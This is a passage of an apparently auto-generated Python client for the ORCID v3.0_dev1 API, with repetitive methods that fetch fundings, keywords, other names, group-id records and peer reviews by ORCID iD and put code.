>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_external_identifiers_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_external_identifiers" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_external_identifiers`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/external-identifiers'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_funding(self, orcid, put_code, **kwargs):
"""
Fetch a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_funding(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Funding
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_funding_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.view_funding_with_http_info(orcid, put_code, **kwargs)
return data
def view_funding_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_funding_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Funding
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_funding" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_funding`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_funding`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/funding/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Funding',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_funding_summary(self, orcid, put_code, **kwargs):
"""
Fetch a Funding Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_funding_summary(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: FundingSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_funding_summary_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.view_funding_summary_with_http_info(orcid, put_code, **kwargs)
return data
def view_funding_summary_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch a Funding Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_funding_summary_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: FundingSummary
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_funding_summary" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_funding_summary`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_funding_summary`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/funding/summary/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FundingSummary',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_fundings(self, orcid, **kwargs):
"""
Fetch all fundings
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_fundings(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Fundings
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_fundings_with_http_info(orcid, **kwargs)
else:
(data) = self.view_fundings_with_http_info(orcid, **kwargs)
return data
def view_fundings_with_http_info(self, orcid, **kwargs):
"""
Fetch all fundings
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_fundings_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Fundings
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_fundings" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_fundings`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/fundings'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Fundings',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_group_id_record(self, put_code, **kwargs):
"""
Fetch a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_group_id_record(put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str put_code: (required)
:return: GroupIdRecord
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_group_id_record_with_http_info(put_code, **kwargs)
else:
(data) = self.view_group_id_record_with_http_info(put_code, **kwargs)
return data
def view_group_id_record_with_http_info(self, put_code, **kwargs):
"""
Fetch a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_group_id_record_with_http_info(put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str put_code: (required)
:return: GroupIdRecord
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_group_id_record" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_group_id_record`")
collection_formats = {}
resource_path = '/v3.0_dev1/group-id-record/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GroupIdRecord',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_group_id_records(self, **kwargs):
"""
Fetch Groups
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_group_id_records(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str page_size:
:param str page:
:param str name:
:return: GroupIdRecords
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_group_id_records_with_http_info(**kwargs)
else:
(data) = self.view_group_id_records_with_http_info(**kwargs)
return data
def view_group_id_records_with_http_info(self, **kwargs):
"""
Fetch Groups
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_group_id_records_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str page_size:
:param str page:
:param str name:
:return: GroupIdRecords
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page', 'name']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_group_id_records" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/v3.0_dev1/group-id-record'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'page_size' in params:
query_params['page-size'] = params['page_size']
if 'page' in params:
query_params['page'] = params['page']
if 'name' in params:
query_params['name'] = params['name']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GroupIdRecords',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_keyword(self, orcid, put_code, **kwargs):
"""
Fetch keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_keyword(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_keyword_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.view_keyword_with_http_info(orcid, put_code, **kwargs)
return data
def view_keyword_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_keyword_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_keyword" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_keyword`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_keyword`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/keywords/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_keywords(self, orcid, **kwargs):
"""
Fetch keywords
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_keywords(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_keywords_with_http_info(orcid, **kwargs)
else:
(data) = self.view_keywords_with_http_info(orcid, **kwargs)
return data
def view_keywords_with_http_info(self, orcid, **kwargs):
"""
Fetch keywords
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_keywords_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_keywords" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_keywords`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/keywords'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_other_name(self, orcid, put_code, **kwargs):
"""
Fetch Other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_other_name(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_other_name_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.view_other_name_with_http_info(orcid, put_code, **kwargs)
return data
def view_other_name_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch Other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_other_name_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_other_name" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_other_name`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_other_name`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/other-names/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_other_names(self, orcid, **kwargs):
"""
Fetch Other names
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_other_names(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_other_names_with_http_info(orcid, **kwargs)
else:
(data) = self.view_other_names_with_http_info(orcid, **kwargs)
return data
def view_other_names_with_http_info(self, orcid, **kwargs):
"""
Fetch Other names
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_other_names_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_other_names" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_other_names`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/other-names'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_peer_review(self, orcid, put_code, **kwargs):
"""
Fetch a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_peer_review(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: PeerReview
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_peer_review_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.view_peer_review_with_http_info(orcid, put_code, **kwargs)
return data
def view_peer_review_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_peer_review_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: PeerReview
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_peer_review" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_peer_review`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_peer_review`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/peer-review/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PeerReview',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_peer_review_summary(self, orcid, put_code, **kwargs):
"""
Fetch a Peer Review Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_peer_review_summary(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: PeerReviewSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_peer_review_summary_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.view_peer_review_summary_with_http_info(orcid, put_code, **kwargs)
return data
def view_peer_review_summary_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch a Peer Review Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_peer_review_summary_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: PeerReviewSummary
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_peer_review_summary" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_peer_review_summary`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_peer_review_summary`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/peer-review/summary/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PeerReviewSummary',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_peer_reviews(self, orcid, **kwargs):
"""
Fetch all peer reviews
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_peer_reviews(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: PeerReviews
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_peer_reviews_with_http_info(orcid, **kwargs)
else:
(data) = self.view_peer_reviews_with_http_info(orcid, **kwargs)
return data
def view_peer_reviews_with_http_info(self, orcid, **kwargs):
"""
Fetch all peer reviews
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_peer_reviews_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: PeerReviews
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_peer_reviews" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_peer_reviews`")
collection_formats = {}
